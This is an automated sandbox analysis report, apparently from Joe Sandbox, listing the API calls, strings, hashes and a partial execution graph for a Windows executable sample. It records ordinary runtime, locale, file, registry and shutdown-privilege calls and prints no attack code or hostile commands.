                                                    • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                    • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                    • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                    • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 107509674-3733053543
                                                    • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                    • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                    • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                    • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                    APIs
                                                    • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                    • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 3473537107-0
                                                    • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                    • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                    • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                    • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                    • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                    • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                    • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                    APIs
                                                    • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: SystemTime
                                                    • String ID:
                                                    • API String ID: 2656138-0
                                                    • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                    • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                    • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                    • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                    APIs
                                                    • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Version
                                                    • String ID:
                                                    • API String ID: 1889659487-0
                                                    • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                    • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                    • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                    • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                    • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                    • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                    • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressCloseHandleModuleProc
                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                    • API String ID: 4190037839-2401316094
                                                    • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                    • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                    • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                    • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                    • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                    • String ID:
                                                    • API String ID: 1694776339-0
                                                    • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                    • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                    • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                    • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                    APIs
                                                    • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                      • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                      • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale$DefaultSystem
                                                    • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                    • API String ID: 1044490935-665933166
                                                    • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                    • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                    • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                    • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                    APIs
                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                    • LocalFree.KERNEL32(0052FC50,00000000,00401AB4), ref: 00401A1B
                                                    • VirtualFree.KERNEL32(?,00000000,00008000,0052FC50,00000000,00401AB4), ref: 00401A3A
                                                    • LocalFree.KERNEL32(0052ED00,?,00000000,00008000,0052FC50,00000000,00401AB4), ref: 00401A79
                                                    • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                    • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                    • String ID:
                                                    • API String ID: 3782394904-0
                                                    • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                    • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                    • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                    • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                    APIs
                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                    • ExitProcess.KERNEL32 ref: 00403DE5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ExitMessageProcess
                                                    • String ID: Error$Runtime error at 00000000$9@
                                                    • API String ID: 1220098344-1503883590
                                                    • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                    • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                    • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                    • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                    • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocString
                                                    • String ID:
                                                    • API String ID: 262959230-0
                                                    • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                    • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                    • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                    • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                    • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CommandHandleLineModule
                                                    • String ID: U1hd.@$%Q
                                                    • API String ID: 2123368496-1717643236
                                                    • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                    • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                    • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                    • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                    APIs
                                                    • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                    • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                    • String ID:
                                                    • API String ID: 730355536-0
                                                    • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                    • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                    • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                    • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                    APIs
                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: QueryValue
                                                    • String ID: )q@
                                                    • API String ID: 3660427363-2284170586
                                                    • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                    • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                    • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                    • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                    APIs
                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastSleep
                                                    • String ID:
                                                    • API String ID: 1458359878-0
                                                    • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                    • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                    • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                    • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                    Execution Graph

                                                    Execution Coverage:16%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:4.4%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:68
                                                    execution_graph 49750 402584 49751 402598 49750->49751 49752 4025ab 49750->49752 49780 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49751->49780 49754 4025c2 RtlEnterCriticalSection 49752->49754 49755 4025cc 49752->49755 49754->49755 49766 4023b4 13 API calls 49755->49766 49756 40259d 49756->49752 49758 4025a1 49756->49758 49759 4025d5 49760 4025d9 49759->49760 49767 402088 49759->49767 49762 402635 49760->49762 49763 40262b RtlLeaveCriticalSection 49760->49763 49763->49762 49764 4025e5 49764->49760 49781 402210 9 API calls 49764->49781 49766->49759 49768 40209c 49767->49768 49769 4020af 49767->49769 49788 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49768->49788 49770 4020c6 RtlEnterCriticalSection 49769->49770 49772 4020d0 49769->49772 49770->49772 49777 402106 49772->49777 49782 401f94 49772->49782 49773 4020a1 49773->49769 49774 4020a5 49773->49774 49774->49777 49777->49764 49778 4021f1 RtlLeaveCriticalSection 49779 4021fb 49778->49779 49779->49764 49780->49756 49781->49760 49785 401fa4 49782->49785 49783 401fd0 49787 401ff4 49783->49787 49794 401db4 49783->49794 49785->49783 49785->49787 49789 401f0c 49785->49789 49787->49778 49787->49779 49788->49773 49798 40178c 49789->49798 49792 401f29 49792->49785 49795 401e02 49794->49795 49796 401dd2 49794->49796 49795->49796 49821 401d1c 49795->49821 49796->49787 49801 4017a8 49798->49801 49800 4017b2 49817 401678 VirtualAlloc 49800->49817 49801->49800 49803 40180f 49801->49803 49806 401803 49801->49806 49809 4014e4 49801->49809 49818 4013e0 LocalAlloc 49801->49818 49803->49792 49808 401e80 9 API calls 49803->49808 49805 4017be 49805->49803 49819 4015c0 VirtualFree 49806->49819 49808->49792 49810 4014f3 VirtualAlloc 49809->49810 49812 401520 49810->49812 49813 401543 49810->49813 49820 401398 LocalAlloc 49812->49820 49813->49801 49815 40152c 49815->49813 49816 401530 VirtualFree 49815->49816 49816->49813 49817->49805 49818->49801 49819->49803 49820->49815 49822 401d2e 49821->49822 49823 401d51 49822->49823 49824 401d63 49822->49824 49834 401940 49823->49834 49825 401940 3 API calls 49824->49825 49827 401d61 49825->49827 49828 401d79 49827->49828 49844 401bf8 9 API calls 49827->49844 49828->49796 49830 401d88 49831 401da2 49830->49831 49845 401c4c 9 API calls 49830->49845 49846 401454 LocalAlloc 49831->49846 49835 401966 49834->49835 49843 4019bf 49834->49843 49847 40170c 49835->49847 49839 401983 49840 40199a 49839->49840 49852 4015c0 VirtualFree 49839->49852 49840->49843 49853 401454 LocalAlloc 49840->49853 49843->49827 49844->49830 49845->49831 49846->49828 49848 401743 49847->49848 49849 401783 49848->49849 49850 40175d VirtualFree 49848->49850 49851 4013e0 LocalAlloc 49849->49851 49850->49848 49851->49839 49852->49840 49853->49843 53498 44b4a0 53499 